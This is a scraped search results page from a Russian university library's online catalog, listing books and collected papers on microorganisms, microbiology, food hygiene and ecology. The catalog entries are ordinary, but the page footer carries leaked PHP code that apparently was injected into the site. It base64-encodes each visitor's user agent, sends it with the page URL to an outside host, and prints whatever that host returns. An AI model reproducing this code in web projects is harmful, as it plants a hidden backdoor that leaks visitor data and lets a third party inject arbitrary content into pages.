Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

80 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=МИКРООРГАНИЗМЫ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 45
1. 
Энциклопедия для детейТ. 2. / ред. С. Исмаилова, ред., сост. А. Майсурян, 1994. - 683 с.
Ключевые слова 
эволюция -- пресмыкающиеся -- птицы -- млекопитающие -- земноводные -- растения - хищники -- животные -- беспозвоночные -- позвоночные животные -- растения - паразиты -- ядовитые растения -- папоротники -- голосеменные -- цветковые растения -- лекарственные растения -- декоративные растения -- хвощи -- плауны -- гербарий -- лишайники -- мхи -- растения -- ботаника -- фотосинтез -- ботанический сад -- дрожжи -- вирусы -- водоросли -- грибы -- простейшие -- происхождение человека -- микроорганизмы -- бактерии -- миграция -- генетика -- размножение (биология) -- происхождение жизни -- близнецы -- цепи питания -- охрана природы -- регенерация -- экологическая ниша -- экологическая система -- память -- клетка (биология) -- органы чувств -- питание -- кровообращение -- сон -- дыхание
Держатели документа (Информация об экземплярах) 
2. 
Мудрецова-Висс К. А. Микробиология, санитария и гигиена [Текст] : учеб. для студ. вузов / К. А. Мудрецова-Висс, А. А. Кудряшова, В. П. Дедюхина, 2009. - 399 с.
Держатели документа (Информация об экземплярах) 
3. 
Жарикова Г. Г. Микробиология продовольственных товаров. Санитария и гигиена [Текст] : учеб. для студентов высш. учеб. заведений / Г. Г. Жарикова, 2007. - 300 с.
Держатели документа (Информация об экземплярах) 
4. 
Экология [Текст] : [энциклопедия для детей] / методолог. ред. тома Д. Володихин, вед. науч. ред. тома Г. Вильчек, отв. ред. тома Е. Ананьева, 2005. - 444 с.
Ключевые слова 
БИОСФЕРА -- СРЕДА ОБИТАНИЯ -- МИГРАЦИИ животных -- НИША ЭКОЛОГИЧЕСКАЯ -- ПОПУЛЯЦИЯ -- ЭКОСИСТЕМА -- БИОМАССА -- МИКРООРГАНИЗМЫ -- САВАННА -- ПУСТЫНЯ -- прерия -- СТЕПЬ -- ТУНДРА -- динозавры -- ОКЕАН - ЭКОЛОГИЯ -- ЧЕЛОВЕК - ЭКОЛОГИЯ -- МОРЕ АРАЛЬСКОЕ - ЭКОЛОГИЯ -- ПЛОТИНА -- СЕЛЬСКОЕ ХОЗЯЙСТВО - ЭКОЛОГИ -- ЛЕС - ЭКОЛОГИЯ -- ОПУСТЫНИВАНИЕ -- КАТАСТРОФА ЭКОЛОГИЧЕСКАЯ -- АТМОСФЕРА - ЭКОЛОГИЯ -- ВОДА - ЭКОЛОГИЯ -- АВТОМОБИЛЬ - ЭКОЛОГИЯ -- ВОЙНА - ЭКОЛОГИЯ -- ЗАГРЯЗНЕНИЕ ОКРУЖАЮЩЕЙ СРЕДЫ -- ПАРНИКОВЫЙ ЭФФЕКТ -- ОЗОНОВАЯ ДЫРА -- ЯДЕРНАЯ ЗИМА -- ЭКОЛОГИЯ ЧЕЛОВЕКА -- ЧИСЛЕННОСТЬ НАСЕЛЕНИЯ -- ВЗРЫВ ДЕМОГРАФИЧЕСКИЙ -- РАСА - БИОЛОГИЯ -- ЗДОРОВЬЕ - ЭКОЛОГИЯ -- ПИТАНИЕ - ЭКОЛОГИЯ -- ГОРОД - ЭКОЛОГИЯ -- УРБАНИЗАЦИЯ - ЭКОЛОГИЯ -- ЖИЛИЩЕ - ЭКОЛОГИЯ -- КРАСНАЯ КНИГА -- ПАРК НАЦИОНАЛЬНЫЙ
Держатели документа (Информация об экземплярах) 
5. 
Шапиро, Яков Семенович. Агробиология : учебное пособие для общеобразовательных учреждений / Я. С. Шапиро, 2010. - 280 с.
Держатели документа (Информация об экземплярах) 
6. 
Современное естествознание : энциклопедия для преподавателей средних школ, учеников старших классов, студентов и аспирантов вузов : в 10 т. / гл. ред. В. Н. Сойфер ; ред. Ю. А. Пашковский. Т. 10 : Современные технологии / ред.: С. Д. Варфоломеев, Р. Н. Кузьмин, Г. В. Лисисчкин, 2000. - 368 с.
Ключевые слова 
физика -- химическая технология -- химические производства -- техническая биология -- физические технологии -- биотехнология -- фотоэлектрическое преобразование -- солнечная энергия -- энергетика -- солнечные фотоэлементы -- нанотехнологии -- сверхатомы -- спиновые волны -- ферромагнитные пленки -- намагниченность -- оптическая обработка информации -- микроэлектроника -- треки -- лазеры -- лазерное излучение -- левитация тел -- силовые поля -- полупроводниковые материалы -- кристаллическая решетка -- лазерные материалы -- скандобораты неодима -- система связи -- двухпроводная линия -- электрический кабель -- металлический волновод -- диэлектрический волновод -- радиорелейная линия -- лучеводная линия -- волоконно-оптическая линия -- взрыв -- взрывные технологии обработки металлов -- взрывная резка -- взрывная сварка -- компактирование взрывом -- штамповка взрывом -- взрывные установки многоразового действия -- взрывы в строительных работах -- ядерный взрыв -- радиолокация -- радиоволны -- РЛС -- магнитное поле -- соленоиды -- электромагниты -- импульсные магнитные поля -- сжатие магнитного потока -- химический завод -- промышленный катализ -- нефтехимия -- переработка нефти -- пиролиз -- термический крекинг -- каталитический крекинг -- каталитический риформинг -- этилен -- полиэтилен -- хлористый винил -- оксид этилена -- этиленовый спирт -- пропилен -- полипропилен -- оксид пропилена -- изопропиловый спирт -- ацетон -- гидроформилирование -- акриловая кислота -- акрилонитрил -- бутадиен -- ароматические углеводы -- бензол -- стирол -- циклогексан -- фенол -- нитробензол -- анилин -- толуол -- ксилол -- полистирольные пластики -- поливинилхлорид -- полиэтилен -- полипропилен -- полимеры -- полиэфиры -- смолы -- формальдегиды -- полиуретаны -- эпоксиды -- инженерные пластики -- пластики специального назначения -- термоэластопласты -- экструдеры -- переработка метана -- производство синтез-газа -- производство синтетических топлив -- синтез органических соединений -- промышленная химия -- ископаемые угли -- синтетическое топливо -- технологии химической переработки угля -- растительная биомасса -- гидролиз древесины -- делигнификация древесины -- утилизация древесных отходов -- безотходная переработка древесины -- целлюлоза -- строение целлюлозы -- структура целлюлозы -- химические свойства целлюлозы -- химические волокна -- производство химических волокон -- силикаты в природе -- силикаты искусственного происхождения -- наука о силикатах -- структурная кристаллохимия -- образование минералов в земной коре -- земная кора -- химия твердого тела -- термическое разложение твердых веществ -- метод прекурсоров -- управление химическими реакциями -- твердофазные реакции -- низкотемпературные процессы -- природный холод -- криохимия -- криохимическая технология перспективных материалов -- экстремальные воздействия -- продовольственная проблема -- демографический взрыв -- производство продуктов питания -- продовольственный кризис -- химизация сельского хозяйства -- химические удобрения -- пестициды -- феромоны -- искусственная пища -- новые пищевые технологии -- геном человека -- гены -- человеческий организм -- ДНК -- РНК -- хромосомы -- банки данных о геноме человека -- эволюция органического мира -- наследственные болезни человека -- функциональная геномика -- секвенирование генома человека -- геном дрозофилы -- генно-инженерные продукты в медицине -- болезнетворные гены -- развитие биотехнологии -- прикладная микробиология -- молекулярная биология -- генетическая инженерия -- генная инженерия -- социальные проблемы -- лекарственные вещества -- ферменты генетической инженерии -- клонирование -- мутации -- биотехнология растений -- генетическая трансформация растений -- устойчивость к гербецидам -- устойчивость к насекомым -- белки -- жиры -- полисахариды -- сельскохозяйственные растения -- технические растения -- генетическая модификация пластид -- биохимия -- нуклеиновые кислоты -- лечение генами -- генотерапия -- наследственные заболевания -- химическая энзимология -- инженерная энзимология -- ферменты -- клеточные биосенсоры -- тонкий органический синтез -- биосинтез -- биотрансформация органических веществ -- реакция окисления -- реакция восстановления -- микроорганизмы
Оглавление 
  • Перспективные физические технологии. - с.5
  • Андреев, В. М. фотоэлектрическое преобразование солнечной энергии / В. М. Андреев. - с.7
  • Биленко, Д. И. Физические основы нанотехнологии / Д. И. Биленко. - с.12
  • Калиникос, Б. А. Спиновые волны в ферромагнитных пленках / Б. А. Калиникос. - с.20
  • Быковский, Ю. А. Оптическая обработка информации / Ю. А. Быковский. - с.27
  • Комаров, Ф. Ф. Формирование треков в кристаллах высокоэнергетическими ионными пучками / Ф. Ф. Комаров. - с.32
  • Быковский, Ю. А. Лазерно-плазменный источник ионов и ядер / Ю. А. Быковский. - с.36
  • Мартыненко, Ю. Г. О проблемах левитации тел в силовых полях / Ю. Г. Мартыненко. - с.41
  • Бордовский, Г. А. Новые полупроводниковые материалы с позиционной неупорядоченностью кристаллической решетки / Г. А. Бордовский. - с.45
  • Писаренко, В. Ф. Новые лазерные материалы / В. Ф. Писаренко. - с.51
  • Шевченко, В. В. Физические основы современных линий передачи сигналов / В. В. Шевченко. - с.56
  • Новиков, С. А. О взрыве и о том, какая от него польза / С. А. Новиков. - с.62
  • Козлов, А. И. Радиолокация. Физические основы и проблемы / А. И. Козлов. - с.67
  • Гайдуков, Ю. П. Физические основы и методы получения магнитного поля / Ю. П. Гайдуков. - с.74
  • Химическая технология. - с.81
  • Сафонов, М. С. Химическая технология / М. С. Сафонов. - с.83
  • Швец, В. Ф. Современный химический завод / В. Ф. Швец. - с.97
  • Швец, В. Ф. Промышленный катализ / В. Ф. Швец. - с.106
  • Караханов, Э. А. Что такое нефтехимия / Э. А. Караханов. - с.106
  • Вольфсон, С. А. Пластики / С. А. Вольфсон. - с.114
  • Максимов, А. Л. Перспективные направления переработки метана / А. Л. Максимов. - с.120
  • Кузнецов, Б. Н. Каталитическое превращение синтез-газа / Б. Н. Кузнецов. - с.124
  • Кузнецов, Б. Н. Новые подходы в химической переработке ископаемых углей / Б. Н. Кузнецов. - с.129
  • Кузнецов, Б. Н. Каталитическая химия растительной биомассы / Б. Н. Кузнецов. - с.136
  • Гальбрайх, Л. С. Целлюлоза и ее производные / Л. С. Гальбрайх. - с.143
  • Гальбрайх, Л. С. Химические волокна / Л. С. Гальбрайх. - с.150
  • Шульц, М. М. Силикаты в природе и практике человека / М. М. Шульц. - с.157
  • Болдырев, В. В. Химия твердого тела - основа новых технологических процессов / В. В. Болдырев. - с.164
  • Болдырев, В. В. Управление химическими реакциями в твердой фазе / В. В. Болдырев. - с.168
  • Третьяков, Ю. Д. Низкотемпературные процессы в химии и технологии / Ю. Д. Третьяков. - с.174
  • Черкасов, Р. А. Химия и производственная проблема / Р. А. Черкасов. - с.181
  • Биотехнология. - с.185
  • Сойфер, В. Н. Международный проект "Геном человека" / В. Н. Сойфер. - с.187
  • Лещинская, И. Б. Введение в биотехнологию / И. Б. Лещинская. - с.202
  • Щелкунов, С. Н. Введение в генетическую инженерию / С. Н. Щелкунов. - с.209
  • Глеба, Ю. Ю. Биотехнология растений / Ю. Ю. Глеба. - с.219
  • Кнорре, Д. Г. Что современная химия и биохимия умеют делать с нуклеиновыми кислотами / Д. Г. Кнорре. - с.225
  • Фаворова, О. О. Лечение генами - фантастика или реальность? / О. О. Фаворова. - с.230
  • Варфоломеев, С. Д. Химическая и инженерная энзимология / С. Д. Варфоломеев. - с.237
  • Березов, Т. Т. Применение ферментов в медицине / Т. Т. Березов. - с.244
  • Варфоломеев, С. Д. Биосенсоры / С. Д. Варфоломеев. - с.248
  • Зорин, В. В. Биотехнология и органический синтез / В. В. Зорин. - с.253
  • Предметный указатель. - с.263
  • Замеченные опечатки Т. 9. Науки о Земле. - с.264
Держатели документа (Информация об экземплярах) 
7. 
Омелянский В.Л. Микроорганизмы как химические реактивы [Текст] / В. Л. Омелянский, 1924. - 54 с. с.
Держатели документа (Информация об экземплярах) 
8. 
Военная экология [Текст]Вып. 9 : учеб.-метод. пособие / каф. №13, 2002. - 77 с.
Держатели документа (Информация об экземплярах) 

Учебно-методическое пособие "Военная экология", выпуск 9 предназначено для курсантов и офицеров ОТИИ, а также жителей мегаполиса, подверженных воздействию опасных химических веществ, в том числе ртути. Данное пособие содержит материалы по влиянию ртути на процессы жизнедеятельности и живые организмы, а также в нем говорится о симптомах отравления ртутью и мерах защиты от ртутного воздействия.

9. 
Современное состояние и перспективы развития индустрии питания и гостеприимства. В 2 т. Т. 2 [Текст] / ред. А. И. Барановский, 2012. - 187 с.
Ключевые слова 
Оглавление 
  • Заблицева, М. А. Характеристика овощного сырья, используемого в производстве йогуртов / М. А. Заблицева, И. А. Долматова. - с.4-8
    Кл. слова: ЙОГУРТ
  • Завгородняя, Л. М. Разработка и оптимизация рецептуры молочного десерта для школьного питания / Л. М. Завгородняя. - с.8-9
    Кл. слова: ДЕСЕРТ МОЛОЧНЫЙ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Загидуллин, Д. З. Влияние материала оборудования на окисление аскорбиновой кислоты / Д. З. Загидуллин, В. Ю. Кирсанов, Ф. Ф. Фазлыев. - с.9-12
    Кл. слова: ОКИСЛЕНИЕ, КИСЛОТА АСКОРБИНОВАЯ
  • Иванова, Л. П. Спорт и здоровье: функциональный продукты специального назначения / Л. П. Иванова, Л. В. Егорова, С. В. Чехунов. - с.13-18
    Кл. слова: СПОРТ - ЗДОРОВЬЕ
  • Ивкова, И. Д. Использование растительных жиров в современных пищевых производствах / И. Д. Ивкова, А. С. Пиляева. - с.18-21
    Кл. слова: ПРОИЗВОДСТВО ПИЩЕВОЕ, ЖИР РАСТИТЕЛЬНЫЙ
  • Ивченко, В. В. Сравнительная характеристика качества кофе натурального растворимого разных производителей / В. В. Ивченко, О. В. Бессонова. - с.22-24
    Кл. слова: КОФЕ
  • Калауденова, А. Т. Изучение потребительских предпочтений и экспертиза качества оливкого масла / А. Т. Калауденова. - с.25-32
    Кл. слова: МАСЛО ОЛИВКОВОЕ
  • Кирсанов, В. Ю. Изучение влияния УФ-излучения на микрофлору предприятий общественного питания на примере дрожжей SACCHAROMYCES CEREVISIAE / В. Ю. Кирсанов, С. Е. Шаталов, Д. З. Загидуллин. - с.32-34
    Кл. слова: УФ - ИЗЛУЧЕНИЯ, МИКРОФЛОРА, ДРОЖЖИ
  • Ковальчук, О. Г. Соблюдение водного режима в марафонском беге / О. Г. Ковальчук, П. А. Скрипников. - с.34-38
    Кл. слова: БЕГ МАРАФОНСКИЙ, РЕЖИМ ПИТЬЕВОЙ, ПИТЬЁ СПОРТИВНОЕ
  • Колчина, В. А. Обогащение творога фруктовыми наполнителями / В. А. Колчина, И. А. Долматова, Т. Н. Зайцева. - с.38-42
    Кл. слова: ПРОДУКТ ТВОРОЖНЫЙ, ТВОРОГ
  • Кольман, О. Я. Инновационные технологии производства мучных кондитерских изделий, обогащенных ягодным порошком / О. Я. Кольман, Г. В. Иванова, Е. О. Никулина. - с.42-45
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ, НАПОЛНИТЕЛЬ ЯГОДНЫЙ
  • Кольман, О. Я. Современные индустриальные технологии в производстве кондитерских изделий на ягодной основе / О. Я. Кольман, Г. В. Иванова, Е. О. Никулина. - с.46-49
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ, НАПОЛНИТЕЛЬ ЯГОДНЫЙ
  • Корнева, О. С. Статистический анализ стабильности производства пива / О. С. Корнева. - с.49-53
    Кл. слова: ПИВО - ПРОИЗВОДСТВО
  • Корнева, О. С. Управление качеством пива на стадии формирования рынка / О. С. Корнева. - с.54-57
    Кл. слова: ПИВО
  • Коротаева, Т. А. Возможность использования фиников в производстве мучных кондитерских изделий / Т. А. Коротаева. - с.57-58
    Кл. слова: ФИНИКИ, ИЗДЕЛИЯ КОНДИТЕРСКИЕ
  • Костюченко, Н. В. Влияние электромагнитной обработки на микроорганизмы / Н. В. Костюченко. - с.59-61
    Кл. слова: ОБРАБОТКА ЭЛЕКТРОМАГНИТНАЯ, МИКРООРГАНИЗМЫ
  • Костенко, Л. Н. Исследование качества чая черного байхового различных производителей / Л. Н. Костенко, О. В. Бессонова. - с.62-64
    Кл. слова: ЧАЙ
  • Кошкин, П. Ю. Перспективы использования пенообразных масс в молочной промышленности / П. Ю. Кошкин. - с.64-67
    Кл. слова: МАССА ПЕНООБРАЗНАЯ, ПРОМЫШЛЕННОСТЬ МОЛОЧНАЯ
  • Крылова, Л. В. Рекомендации в питании спортсменам-любителям / Л. В. Крылова, В. Н. Понкратов. - с.67-70
    Кл. слова: ПИТАНИЕ СПОРТСМЕНОВ
  • Методика оценки сбалансированности белкового состава многокомпонентных продуктов для школьного питания / ; П. А. Лисин, [и др.]. - с.70-77
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Проектирование поликомпонентных пищевых продуктов с заданным составом и свойствами / ; П. А. Лисин, [и др.]. - с.77-85
    Кл. слова: ПРОДУКТЫ ПИЩЕВЫЕ ПОЛИКОМПОНЕНТНЫЕ
  • Локотченко, Н. С. Проблемы и перспективы разработки низколактозных молочных коктейлей и пенообразующими свойствами / Н. С. Локотченко. - с.85-88
    Кл. слова: КОКТЕЙЛЬ МОЛОЧНЫЙ
  • Лопатинская, Т. В. Продукты питания функционального назначения для детей дошкольного возраста / Т. В. Лопатинская, Д. А. Чистякова, О. Я. Соколова. - с.89-92
    Кл. слова: ПИТАНИЕ ДОШКОЛЬНИКОВ
  • Лузан, В. Н. Проектирование продукта на основе рыбного сырья нутриентно-адекватного питанию детей дошкольного возраста / В. Н. Лузан, Л. А. Ключникова, Б. Ш. Цыренжапов. - с.92-99
    Кл. слова: РЫБА - ПИТАНИЕ, ПИТАНИЕ ДОШКОЛЬНИКОВ
  • Лукьянюк, Н. В. Современные индустриальные технологии пищевых продуктов / Н. В. Лукьянюк. - с.99-102
    Кл. слова: ЧАЙ
  • Малкова, Н. К. Расширение ассортимента мучных кондитерских изделий повышенной пищевой ценности для сетевого питания / Н. К. Малкова, Л. Г. Ермош. - с.102-105
    Кл. слова: АССОРТИМЕНТ КОНДИТЕРСКИХ ИЗДЕЛИЙ
  • Мусифуллина, Э. В. Яблочные чипсы сублимационной сушки / Э. В. Мусифуллина, Н. В. Макарова, А. Н. Дмитриева. - с.105-109
    Кл. слова: ЧИПСЫ ЯБЛОЧНЫЕ, СУШКА СУБЛИМАЦИОННАЯ
  • Никифорова, Л. М. Заменители мяса, используемые для получения новых видов мясных продуктов / Л. М. Никифорова, О. В. Бессонова. - с.109-112
    Кл. слова: ЗАМЕНИТЕЛЬ МЯСА
  • Паленков, И. А. Разработка системы управления безопасностью и качеством слабоалкогольной газированной продукции / И. А. Паленков, О. В. Пасько. - с.112-120
    Кл. слова: АЛКОГОЛЬ, ПРОДУКЦИЯ СЛАБОАЛЬКОГОЛЬНАЯ
  • Петрова, Е. И. Перспектива расширения ассортимента молочных продуктов для питания спортсменов / Е. И. Петрова. - с.121-124
    Кл. слова: ПИТАНИЕ СПОРТСМЕНОВ
  • Портнягина, В. А. Производство функциональных продуктов для геродиетического питания / В. А. Портнягина. - с.124-126
    Кл. слова: ПИТАНИЕ ГЕРОДИЕТИЧЕСКОЕ
  • Пушмина, И. Н. Формирование подходов к разработке функциональных молокосодержащих продуктов с использованием природных цеолитов / И. Н. Пушмина, А. В. Бауэр. - с.127-128
    Кл. слова: ЦЕОЛИТ ПРИРОДНЫЙ, ПРОДУКЦИЯ МОЛОКОСОДЕРЖАЩАЯ
  • Романишина, Е. Р. Исследование показателей качества и безопасности мясосодержаших полуфабрикатов / Е. Р. Романишина. - с.129-134
    Кл. слова: ПОЛУФАБРИКАТЫ МЯСНЫЕ
  • Савинцева, Ю. О. Современные индустриальные технологии пищевых продуктов на ОАО "Омская макаронная фабрика" / Ю. О. Савинцева. - с.134-141
    Кл. слова: ИЗДЕЛИЯ МАКАРОННЫЕ, ФАБРИКА МАКАРОННАЯ
  • Сапожников, А. Н. Влияние обработки пшеничной муки энергией инфракрасного излучения на сохраняемость хлеба / А. Н. Сапожников, Л. П. Шорникова, С. К. Волончук. - с.141-145
    Кл. слова: МУКА ПШЕНИЧНАЯ, ХЛЕБ
  • Смирнова, Н. А. Разработка стандарта организации "Биопродукт творожный" / Н. А. Смирнова. - с.146-149
    Кл. слова: БИОПРОДУКТ ТВОРОЖНЫЙ
  • Струпан, Е. А. Технология продуктов переработки дикорастущего сырья / Е. А. Струпан, В. С. Колодязная, О. А. Струпан. - с.149-155
    Кл. слова: СЫРЬЕ ДИКОРАСТУЩЕЕ
  • Трофимов, И. Е. Продукты на основе натурального – основа питания спортсмена / И. Е. Трофимов. - с.156-157
    Кл. слова: СЫРЬЕ НАТУРАЛЬНОЕ, ПИТАНИЕ СПОРТСМЕНОВ
  • Троценко, В. В. Повреждение семян зерновых культур при послеуборочной обработке / В. В. Троценко, А. И. Забудский. - с.158-162
    Кл. слова: ЗЕРНО, ГРЕЧИХА
  • Турлубаева, А. Н. Экология и пища / А. Н. Турлубаева, О. Я. Соколова. - с.162-165
    Кл. слова: ПИЩА - ЭКОЛОГИЯ
  • Унжакова, К. С. Медико-биологические аспекты создания продукции геродиетического питания / К. С. Унжакова, М. В. Исаева, О. Я. Соколова. - с.165-168
    Кл. слова: ПИТАНИЕ ГЕРОДИЕТИЧЕСКОЕ
  • Четвертаков, А. А. Расширение ассортимента продукции за счет использования нетрадиционных видов йодосодержащего растительного сырья / А. А. Четвертаков, Г. В. Иванова, С. В. Чехунов. - с.168-171
    Кл. слова: СЫРЬЕ РАСТИТЕЛЬНОЕ ЙОДОСОДЕРЖАЩЕЕ, АССОРТИМЕНТ ПРОДУКЦИИ
  • Чехомова, Е. А. Товароведная оценка сладко-сливочного масла "Крестьянское" / Е. А. Чехомова, И. А. Ивкова. - с.172-174
    Кл. слова: МАСЛО КОРОВЬЕ
  • Щербина, М. О. Сравнительная характеристика качества варенья различных производителей / М. О. Щербина, Е. П. Галкова. - с.175-177
    Кл. слова: ВАРЕНЬЕ
  • Ходырева, Е. И. Проблемы формирования кластеров общественного питания / Е. И. Ходырева. - с.178-184
    Кл. слова: КЛАСТЕР, ПИТАНИЕ ОБЩЕСТВЕННОЕ
Держатели документа (Информация об экземплярах) 
10. 
Микробиология [Текст] : практикум: учеб.-метод. пособие для студентов специальности 260501 "Технология продуктов общественного питания" / Омский ин-т предпринимательства и права, каф. естественных наук, 2005. - 78 с.
Держатели документа (Информация об экземплярах) 
11. 
Жарикова Г. Г. Микробиология продовольственных товаров. Санитария и гигиена [Текст] : учеб. для студентов высш. учеб. заведений / Г. Г. Жарикова, 2005. - 300 с.
Держатели документа (Информация об экземплярах) 
12. 
Азарова, Ольга Петровна. Основы микробиологии и биотехнологии [Текст] : учеб. пособие. Ч. 1, 2008. - 49 с.
Оглавление 
  • Введение. - с.3
  • Микроорганизмы превращений соединений серы (табл. 1). - с.5
  • Микроорганизмы превращения соединений фосфора (табл. 2). - с.7
  • Хемоорганогетеротрофы (табл. 3). - с.10
  • Микроорганизмы спиртового брожения (табл. 4а). - с.12
  • Микроорганизмы спиртового брожения (табл. 4б). - с.14
  • Микроорганизмы спиртового брожения (табл. 4в). - с.15
  • Микроорганизмы аммонификации белковых веществ (аэробы) (табл. 5). - с.16
  • Микроорганизмы разложения целлюлозы (табл. 6). - с.18
  • Микроорганизмы окисления углеводородов (табл. 7). - с.23
  • Микроорганизмы процесса нитрификации (табл. 8). - с.25
  • Микроорганизмы окисления жиров (табл. 9). - с.27
  • Микроорганизмы окисления этилового спирта в уксусную кислоту (табл. 10). - с.33
  • Микроорганизмы маслянокислого брожения (табл. 11). - с.34
  • Микроорганизмы гнилостного разложения (табл. 12). - с.37
  • Приложение. - с.40
  • Библиографический список. - с.47
Держатели документа (Информация об экземплярах) 

Содержит систематизированные и обработанные данные относительно морфологических, культуральных и биохимических характеристик основных видов микроорганизмов, участвующих в круговороте веществ в природе и в наиболее распространенных биотехнологических процессах.

может использоваться в качестве опорных конспектов по темам "Морфология, систематика и физиология микроорганизмов. Морфология и размножение микроорганизмов", а также в качестве справочного материала при выполнении лабораторного практикума по курсу "Основы микробиологии и биотехнологии".

Полный текст
13. 
Новожилова, Мария Ивановна. Мир невидимок [Текст] : о работе микробиологов / М. И. Новожилова, Т. А. Младова, 1979. - 46, [2] с.
Держатели документа (Информация об экземплярах) 
14. 
Миллиметровые волны и фотосинтезирующие организмы [Текст] : Моногр. / А. Х. Тамбиев, Н. Н. Кирикова, О. В Бецкий, Ю. В. Гуляев; Под ред. Ю. В. Гуляева, А. Х. Тамбиева, 2003. - 174, [1] с.
Держатели документа (Информация об экземплярах) 
15. 
Артюхова, Светлана Ивановна. Использование пробиотиков и пребиотиков в биотехнологии производства биопродуктов [Текст] : монография / С. И. Артюхова, Ю. А. Гаврилова, 2010. - 111 с.
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
16. 
Бирюкова, Вера Васильевна. Санитария и гигиена [Текст] : учеб. пособие / В. В. Бирюкова, Н. В. Шевченко, 2011. - 76 с.
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
17. 
Микробиология, гигиена и санитария в торговле [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования и уч-ся учеб. заведений нач. проф. образования / Автор-сост. Т. П. Трушина, 2000. - 315,[1] с.
18. 
Мудрецова-Висс, Клавдия Алексеевна. Микробиология, санитария и гигиена [Текст] : Учебник гриф-МО / К. А. Мудрецова-Висс, В. П. Дедюхина, 2010. - 400 с.

Учебник состоит из трех взаимосвязанных частей: основы общей микробиологии (гл. 1-3); микробиология, санитария пищевых продуктов (гл.4-7) и основы гигиены и санитарии в торговле (гл. 8).

Приведены современные данные о морфологии и физиологии микроорганизмов, биохимических процессах, вызываемых ими, а также рассмотрено влияние экологических факторов на микрофлору, развивающуюся в продуктах питания при транспортировании, хранении, реализации и переработке сырья. Показана роль микроорганизмов в процессе формирования и изменения качества пищевых продуктов и возникновения ряда заболеваний, вызываемых патогенными и условно-патогенными видами. Применительно к профилю специальности изложены микробиологические процессы, приводящие к понижению качества и потерям ценности пищевых продуктов. Рекомендованы пути, способы и мероприятия, позволяющие предотвратить эти процессы или значительно уменьшить их. Рассмотрены основные санитарно-эпидемиологические требования к предприятиям торговли и обороту в них продовольственного сырья и пищевых продуктов.

Предназначен для студентов высших учебных заведений, аспирантов, преподавателей и практических работников.

19. 
Шапиро Я.С. Микроорганизмы [Текст] : Уч.пособие / Я. С. Шапиро, 2003. - 324 с.
Держатели документа (Информация об экземплярах) 
20. 
Экология микроорганизмов [Текст] : Учеб. для ун-тов по специальности 012400 "Микробиология" и др. биол. специальностям / А. И. Нетрусов, Е. А. Бонч-Осмоловская, В. М. Горленко и др.; Под ред. А. И. Нетрусова, 2004. - 266, [1] с.

Учебник охватывает все разделы экологии микроорганизмов. В нем рассмотрены развитие <микробов> в их естественных <средах обитания>, механизмы приспособления микробов к <экстремальным условиям>, описаны современные молекулярно-биологические методы изучения микробного разнообразия в природных нишах, приемы изучения и измерения микробной активности в природе.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2994 - 21.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.99 с.12 запросов, 0.50c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;